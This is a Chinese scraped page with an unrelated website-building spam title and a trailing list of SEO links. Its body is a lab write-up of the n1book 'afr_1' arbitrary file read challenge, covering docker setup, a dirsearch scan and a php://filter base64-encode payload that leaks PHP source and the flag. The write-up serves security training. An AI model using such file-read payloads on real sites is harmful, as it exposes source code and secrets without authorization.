当前位置: 首页 > news >正文

语言互动网站建设定安网站建设

语言互动网站建设,定安网站建设,做网站能做职业吗,x网站免费模板免费下载1.1漏洞描述 漏洞名称任意文件读取漏洞 afr_1漏洞类型文件读取漏洞等级⭐漏洞环境docker攻击方式 1.2漏洞等级 高危 1.3影响版本 暂无 1.4漏洞复现 1.4.1.基础环境 靶场docker工具BurpSuite 1.4.2.靶场搭建 1.创建docker-compose.yml文件 version: 3.2 services: web: …

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_1
漏洞类型文件读取
漏洞等级
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.靶场搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
    ports:
      - 80:80

        2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 80端口

        搭建成功 

1.5深度利用

1.5.1漏洞点

  • 1.dirsearch目录扫描

dirsearch --url http://10.9.47.79 

  • 2.查看 /flag.php

  • 3.查看/index.php

  • 发现跳转到 ?p=hello

所以可能是/index.html包含了?p=hello

文件包含

  • 4.使用php://fileter 读取(读取php源码)

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

  • 它读取到的结果是base64加密的 

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

  • 5.进行base64解码

  • 6.成功拿到flag

n1book{afr_1_solved}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

http://www.yayakq.cn/news/832560/

相关文章:

  • 用qt做网站可以吗太原百度网站排名优化
  • 服务好的常州网站建设怎样做网站代理
  • 海南网站建设网站开发小程序app高端品销售网站
  • 天津市建设工程合同备网站视觉设计公司排名
  • 西宁做网站君博示范详情页模板尺寸
  • 网站建设酷隆篇高端网站愿建设
  • 网站超市西安做网站商标
  • 做防护用品的网站数据库网站建设教程
  • 苏州网站建设智能 乐云践新石家庄营销网站建设
  • 如何做网站百科网站建设需要建站公司沟通哪些
  • 做网站培训班wordpress表结构怎么样
  • 海外精品网站建设小程序样式模板
  • 易语言怎么把网站音乐做进去惠州惠阳网站建设
  • 天津做无痛人流费用五洲网站大数据营销系统怎么样
  • 推广一个网站周期wordpress 屏蔽
  • 网站建设怎么找客户虚拟空间网站ftp如何差异化同步
  • 郑州企业网站优化公司wordpress上传数据
  • php网站下载器网站快照时间
  • 用html5设计个人网站确定网站建设的目的
  • 提交网站收录入口怎么做网站关键词搜索
  • 软件网站开发市场前景企业网站建设情况
  • 珠海网站建设托管怎么有自己的网站
  • 站长之家素材网东莞企业网站搭建制作
  • 网站买空间杭州设计公司logo
  • 百度免费做网站网站怎样做优化网页
  • 物流公司网站建设系统规划免费的服务器有哪些
  • 天津网站建设案例展示营销团队名称
  • 浙江省建设局城市平台网站天津微信网站开发
  • 广州那里有学做拼多多网站的wordpress 4.7.1
  • 建设银行网站怎么短信转账襄阳云平台网站建设